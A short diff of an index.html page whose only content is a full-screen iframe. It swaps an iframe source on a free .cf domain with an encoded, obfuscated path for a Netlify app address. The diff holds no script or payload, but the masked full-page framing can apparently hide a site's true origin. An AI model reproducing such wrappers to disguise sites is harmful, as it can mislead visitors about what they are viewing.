--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <html><head></head><body style="margin: 0px;">
-<iframe src="https://www.european-geography.cf/service/hvtrs8%2F-ulbnoakgdq-eaoeq.aoo%2Fue%60gn%2Fjopdg-iinlgr%2Fymu%2Fvq-302%2Fknfez.jtol" 
+<iframe src="https://heartfelt-salmiakki-9e8ee9.netlify.app/" 
 style="width: 100%; height: 100%;">
 </iframe></body></html>
 <style>body {
